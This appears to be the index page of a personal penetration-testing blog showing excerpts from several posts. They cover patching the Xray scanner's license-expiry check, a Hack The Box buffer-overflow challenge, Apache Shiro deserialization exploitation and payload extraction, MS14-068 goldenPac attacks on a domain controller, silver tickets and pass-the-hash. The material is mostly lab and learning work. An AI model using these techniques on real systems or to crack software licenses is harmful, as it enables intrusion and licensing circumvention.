wubba lubba dub dub.
post @ 2023-12-24

Write this blog due to Xray was EOL. Last version 1.9.11.

1. Patching Walkthrough for x86

  1. run program
1
2
./xray_darwin_amd64
this license is expired, expiration time is 2022-08-03 08:00:00
  1. find and locate string
1
2
3
4
00000000: 74 68 69 73 20 6c 69 63 65 6e 73 65 20 69 73 20  this license is 
00000010: 65 78 70 69 72 65 64 2c 20 65 78 70 69 72 61 74 expired, expirat
00000020: 69 6f 6e 20 74 69 6d 65 20 69 73 20 25 73 ion time is %s

  1. find references
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
04f92ba3  e838fdffff         call    sub_4f928e0
04f92ba8 440f11bc24980000…movups xmmword [rsp+0x98 {var_48}], xmm15
04f92bb1 e8eabf07ff call sub_400eba0
04f92bb6 488d0dc3d46800 lea rcx, [rel data_5620080]
04f92bbd 48898c2498000000 mov qword [rsp+0x98 {var_48}], rcx {data_5620080}
04f92bc5 48898424a0000000 mov qword [rsp+0xa0 {var_48+0x8}], rax
04f92bcd 488d05657aab00 lea rax, [rel data_5a4a639] {"this license is expired, expirat…"}
04f92bd4 bb2e000000 mov ebx, 0x2e
04f92bd9 488d8c2498000000 lea rcx, [rsp+0x98 {var_48}]
04f92be1 bf01000000 mov edi, 0x1
04f92be6 4889fe mov rsi, rdi {0x1}
04f92be9 e8d21417ff call sub_41040c0
04f92bee 4889d9 mov rcx, rbx {0x2e}
04f92bf1 4889c3 mov rbx, rax
04f92bf4 31c0 xor eax, eax {0x0}
04f92bf6 488bac24d8000000 mov rbp, qword [rsp+0xd8 {__saved_rbp}]
04f92bfe 4881c4e0000000 add rsp, 0xe0
04f92c05 c3 retn {__return_addr}

04f92ba3 was jumped from 04f92a26

1
2
3
04f92a1f  488b5838           mov     rbx, qword [rax+0x38]
04f92a23 4839fb cmp rbx, rdi
04f92a26 0f8c77010000 jl 0x4f92ba3
Read More
post @ 2021-04-18

SSL Fingerprint and Bypass

之前搞某个网站发现使用不同客户端发起请求会有不同的响应结果,就很神奇

Python 403 Burp 200?

先看两个不同客户端发起的请求结果

Burp

image-20210417230416894

Python3 Requests

同样的请求复制到python3中用requests发包:

1
2
3
4
5
6
7
8
9
10
11
12
13
<body data-spm="7663354">
<div data-spm="1998410538">
<div class="header">
<div class="container">
<div class="message">
很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断。
<div>您的请求ID是: <strong>
276aedd416186716424122798e3951</strong></div>
</div>
</div>
</div>
<div class="main">
<div class="container">

一样的请求地址一样的参数一样的http header,burp发送的请求正常响应,python发送的被waf拦截,curl模拟请求也被拦截

Read More
post @ 2021-04-14

HTB - You know 0xDiablos

Checksec

1
2
3
4
5
6
7
8
➜  You know 0xDiablos checksec vuln
[*] '/mnt/hgfs/aresx/pwn/htb/You know 0xDiablos/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments

Fuzz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
➜  You know 0xDiablos cyclic 500 > out
➜ You know 0xDiablos gdb-gef --ex run ./vuln < out
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
GEF for linux ready, type `gef' to start, `gef config' to configure
92 commands loaded for GDB 9.1 using Python engine 3.8
Starting program: /mnt/hgfs/aresx/pwn/htb/You know 0xDiablos/vuln
You know who are 0xDiablos:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae

Program received signal SIGSEGV, Segmentation fault.
0x62616177 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax : 0x1f5
$ebx : 0x62616175 ("uaab"?)
$ecx : 0xffffffff
$edx : 0xffffffff
$esp : 0xffffd370 → "xaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaacka[...]"
$ebp : 0x62616176 ("vaab"?)
$esi : 0xf7fb3000 → 0x001e9d6c
$edi : 0xf7fb3000 → 0x001e9d6c
$eip : 0x62616177 ("waab"?)
$eflags: [zero carry parity adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd370│+0x0000: "xaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaacka[...]"$esp
0xffffd374│+0x0004: "yaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaacla[...]"
0xffffd378│+0x0008: "zaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacma[...]"
0xffffd37c│+0x000c: "baaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacna[...]"
0xffffd380│+0x0010: "caacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoa[...]"
0xffffd384│+0x0014: "daaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpa[...]"
0xffffd388│+0x0018: "eaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqa[...]"
0xffffd38c│+0x001c: "faacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacra[...]"
──────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x62616177
──────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "vuln", stopped 0x62616177 in ?? (), reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────── trace ────
─────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ quit

Find offset

  • eip
1
➜  You know 0xDiablos cyclic -l 0x62616177188
  • esp
1
2
➜  You know 0xDiablos cyclic -l xaab
192
Read More

Docsify auto generate sidebar.md

项目结构

1
2
3
4
5
6
╰─➤ ls -l
total 408
drwxr-xr-x 9 aresx staff 288 2 20 11:50 VulWiki
-rw-r--r--@ 1 aresx staff 140136 2 20 11:51 _sidebar.md
-rw-r--r--@ 1 aresx staff 1895 11 3 23:49 index.html
-rwxr-xr-x 1 aresx staff 1025 10 16 13:30 sidebar.sh

复制到index.html 同级目录下执行

注意:修改25行root_dir 中的目录为存储Markdown文件的目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/bin/bash
IFS=$(echo -en "\n\b")
function getdir(){
for element in `ls -1 $1`
do
dir_or_file=$1"/"$element
counter=`echo $dir_or_file | grep -o / | wc -l`
let counter-=2
if [ -d $dir_or_file ] ;
then

printf '%0.s ' $(seq 0 $counter) >> _sidebar.md
echo "- $element" >> _sidebar.md
getdir $dir_or_file
else
echo $dir_or_file
printf '%0.s ' $(seq 0 $counter) >> _sidebar.md
path=`echo $dir_or_file| sed "s/[ ]/%20/g" | sed "s/[+]/%2B/g"`
title=`echo $element | sed "s/.md//"`
echo "- [$title](./$path)" >> _sidebar.md
fi
done
}

root_dir=`ls -d VulWiki/*/`
#root_dir=`ls -d */ "$1/VulWiki" | sed 's/\///g'`
:> _sidebar.md
for dir in $root_dir
do
if [ "$dir" = "." ]
then
continue
else
C1=`echo $dir | cut -f2 -d '/'`
echo "- $C1" | cut -f2 -d '/' >> _sidebar.md
getdir `echo $dir | sed s'/.$//'`
fi
done

脚本会依次递归扫描root_dir下的目录中的所有Markdown文件

1
2
╰─➤ ls -d VulWiki/*/
VulWiki/IOT安全/ VulWiki/Web安全/ VulWiki/系统安全/

并且针对文件名中的空格和+号进行了处理,避免出现链接无法点击的问题

Read More

Shiro 高版本加密方式下的漏洞利用

加密方式的变化

Shiro高版本加密方式从AES-CBC换成了AES-GCM,由于加密算法的变化导致用于攻击shiro-550的exp无法试用于新版Shiro

加密模式的变化发生在针对Oracle Padding Attack的修复,1.4.2版本更换为了AES-GCM加密方式

高版本的加密解密调用了AesCipherService:

1
2
3
4
5
6
7
8
9
10
11
12
private byte[] cipherKey;
private CipherService cipherService = new AesCipherService();

public byte[] encrypt(byte[] serialized) {
ByteSource byteSource = cipherService.encrypt(serialized, cipherKey);
return byteSource.getBytes();
}

public byte[] decrypt(byte[] encrypted) {
ByteSource byteSource = cipherService.decrypt(encrypted, cipherKey);
return byteSource.getBytes();
}

AesCipherService 中设定的加密方式为AES-GCM,Padding为None

GCM模式下,补位信息是完全不需要考虑的,明文与密文有着相同的长度

1
2
3
4
5
6
7
8
9
10
11
12
13
14
public class AesCipherService extends DefaultBlockCipherService {
private static final String ALGORITHM_NAME = "AES";

public AesCipherService() {
super("AES");
this.setMode(OperationMode.GCM);
this.setStreamingMode(OperationMode.GCM);
this.setPaddingScheme(PaddingScheme.NONE);
}

protected AlgorithmParameterSpec createParameterSpec(byte[] iv, boolean streaming) {
return (AlgorithmParameterSpec)((!streaming || !OperationMode.GCM.name().equals(this.getStreamingModeName())) && (streaming || !OperationMode.GCM.name().equals(this.getModeName())) ? super.createParameterSpec(iv, streaming) : new GCMParameterSpec(this.getKeySize(), iv));
}
}

加密解密实现

Read More

Shiro反序列化 Xray6个tomcat回显Gadget Payload提取

Xray新版本支持了shiro反序列化的检测,前提是拥有高级版License

对于shiro反序列化的检测首先会使用默认key尝试6个回显Gadget,然后尝试使用连平台,全部失败之后会尝试内置的100个key进行爆破

有价值的就是那6个支持tomcat全版本回显的Payload了

设置xray通过burp代理发送流量,然后修改配置文件中的http和tcp超时都为2秒

启动拦截器后放行第一个检测是否使用Shiro的请求之后开启拦截,等待扫描进程结束,可以在HTTP History中看到检测使用的Payload,多次拦截并按顺序Drop修改返回包头部包含检测的Testecho内容,就可以找到该payload对应的gadget

分别是CommonsCollections1 CommonsCollections2 CommonsBeanutils1 CommonsBeanutils2 Jdk7u21 Jdk8u20

获取到Payload之后解密然后base64保存,可以方便在没有使用默认key需要改key的情况中的使用

提取之后的Payload在下面的脚本里

https://github.com/Ares-X/shiro-exploit.git

Read More

学习java怎么能不装模作样的调试一下代码呢,以Shiro为例,漏洞环境最方便的是Vulhub这种漏洞靶场打包好的docker镜像,手上又没有构建docker时的代码,咋调试呢?

代码获取

新建一个空项目

漏洞环境的代码需要从docker中拖出来,以shiro为例,启动之后docker exec -it xxx /bin/bash 进入容器,找到漏洞环境的程序

-w605

可见漏洞环境被打包成了jar,然后通过java -jar启动的,那么把shirodemo-1.0-SNAPSHOT.jar 复制出来,就获取了漏洞环境的全部内容

1
docker cp a7:/shirodemo-1.0-SNAPSHOT.jar ./

还原代码

调试代码需要本地拥有代码文件,jar可以作为Library添加到项目,然后idea会自动将class还原成代码,但是添加之后发现jar中的lib目录还有jar,这里面引入的jar无法再次作为Library添加,所以看不到其中的代码

可以直接将jar解压到项目根目录

Read More
post @ 2020-03-23

起因:利用ms14-068提权漏洞时尝试使用impacket工具包中的goldenPac模块来直接获取域控shell

使用途中出现报错Attempted "__iter__" operation on ASN.1 schema object

1
2
3
4
5
6
7
C:\Users\leo\Desktop>goldenPac.exe sun.com/leo:123.com@dc.sun.com
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] User SID: S-1-5-21-3388020223-1982701712-4030140183-1110
[*] Forest SID: S-1-5-21-3388020223-1982701712-4030140183
[*] Attacking domain controller DC.sun.com
[-] Attempted "__iter__" operation on ASN.1 schema object

起初怀疑是打包的exe运行环境有问题,搭建代理进内网,使用proxychains代理goldenPac.py 仍出现该错误

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
aresx@XXXXXXXXXX:/mnt/e$ proxychains goldenPac.py sun.com/leo:123.com@dc.sun.com
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[proxychains] Strict chain ... 192.168.10.134:33080 ... sun.com:445 ... OK
[*] User SID: S-1-5-21-3388020223-1982701712-4030140183-1110
[proxychains] Strict chain ... 192.168.10.134:33080 ... sun.com:445 ... OK
[proxychains] Strict chain ... 192.168.10.134:33080 ... sun.com:445 ... OK
[*] Forest SID: S-1-5-21-3388020223-1982701712-4030140183
[proxychains] Strict chain ... 192.168.10.134:33080 ... sun.com:135 ... OK
[proxychains] Strict chain ... 192.168.10.134:33080 ... sun.com:49155 ... OK
[*] Attacking domain controller DC.sun.com
[proxychains] Strict chain ... 192.168.10.134:33080 ... DC.sun.com:88 ... OK
[proxychains] Strict chain ... 192.168.10.134:33080 ... DC.sun.com:88 ... OK
[proxychains] Strict chain ... 192.168.10.134:33080 ... DC.sun.com:88 ... OK
[proxychains] Strict chain ... 192.168.10.134:33080 ... DC.sun.com:88 ... OK
[-] Attempted "__iter__" operation on ASN.1 schema object

谷歌一顿猛搜,发现在其他的开源项目中也有人提过这个错误的issue,原因是pyasn1库的bug,然后参考一个使用低版本pyasn1库的解决方案

pip list 确定了当前安装的pyasn1版本为0.4.8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
aresx@XXXXXXXXXX:/mnt/e$ pip list
Package Version
----------------------------- --------
args 0.1.0
asn1crypto 0.24.0
atomicwrites 1.1.5
attrs 18.2.0
backports.functools-lru-cache 1.5
beautifulsoup4 4.7.1
certifi 2019.3.9
cffi 1.14.0
chardet 3.0.4
Click 7.0
clint 0.5.1
colorama 0.4.1
configparser 3.5.0b2
contextlib2 0.5.5
crackmapexec 3.1.5
cryptography 2.8
dirhunt 0.6.0
distorm3 3.4.1
dnspython 1.16.0
entrypoints 0.3
enum34 1.1.6
et-xmlfile 1.0.1
Flask 1.1.1
funcsigs 1.0.2
future 0.18.2
pathlib2 2.3.5
Pillow 6.2.1
pip 18.1
pluggy 0.13.0
proxy-db 0.2.3
py 1.8.1
py2-ipaddress 3.4.1
pyasn1 0.4.8

卸载,安装低版本0.4.5

Read More

域渗透学习(一)Windows认证机制
域渗透学习(二)Kerberos协议
域渗透学习(三)域内信息搜集
域渗透学习(四)Dump Password & Hash
域渗透学习(五)基于IPC的远程连接
域渗透学习(六)PTH 哈希传递攻击

PTT 票据传递攻击

复习: 域渗透学习(二)Kerberos协议

白银票据(Silver Tickets)

特点:

  • 无需与KDC交互
  • 需要目标Server的NTLM Hash

在前文kerberos认证中的Ticket的组成:

1
Ticket=Server Hash(Server Session Key+Client info+End Time) 

当拥有Server(Service) Hash时,我们就可以伪造一个不经过KDC认证的一个Ticket。
Server Session Key在未发送Ticket之前,服务器是不知道Server Session Key是什么的。 所以,一切凭据都来源于Server Hash。

获取Server Hash

Read More

域渗透学习(一)Windows认证机制
域渗透学习(二)Kerberos协议
域渗透学习(三)域内信息搜集
域渗透学习(四)Dump Password & Hash
域渗透学习(五)基于IPC的远程连接

PTH 哈希传递攻击

在前文Windows认证机制(网络认证 Net NTLM)章节中可以了解到,在获取了目标机器用户的NTLM Hash的情况下,可无需破解哈希直接使用目标的NTLM Hash来完成身份验证

哈希提取请参考域渗透学习(四)DUMP PASSWORD & HASH

如这里获取到的NTLM Hash 4d01fbeeaf2b706478943e0889df5622

可完成Pass The Hash的工具:

注意,PTH仍然是基于IPC远程连接实现的,所以关于账户权限,与 域渗透学习(五)基于IPC的远程连接 中提到的相同

具体参考:关于IPC连接和Psexec的用户权限问题

impacket

Read More
⬆︎TOP